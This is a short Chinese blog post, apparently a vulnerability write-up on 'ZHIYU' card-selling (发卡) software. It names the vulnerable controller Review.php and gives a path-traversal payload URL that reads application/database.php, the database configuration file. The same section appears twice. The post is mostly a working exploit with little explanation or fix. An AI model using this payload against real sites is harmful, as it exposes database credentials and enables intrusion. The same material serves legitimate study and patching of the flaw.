ZHIYU 发卡漏洞合集
任意文件读取
漏洞文件 application\wechat\controller\Review.php
1 | public function img() |
Payload:
https://www.xxxx.com/wechat/Review/img?url=../application/database.php
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Caps!
评论
漏洞文件 application\wechat\controller\Review.php
1 | public function img() |
Payload:
https://www.xxxx.com/wechat/Review/img?url=../application/database.php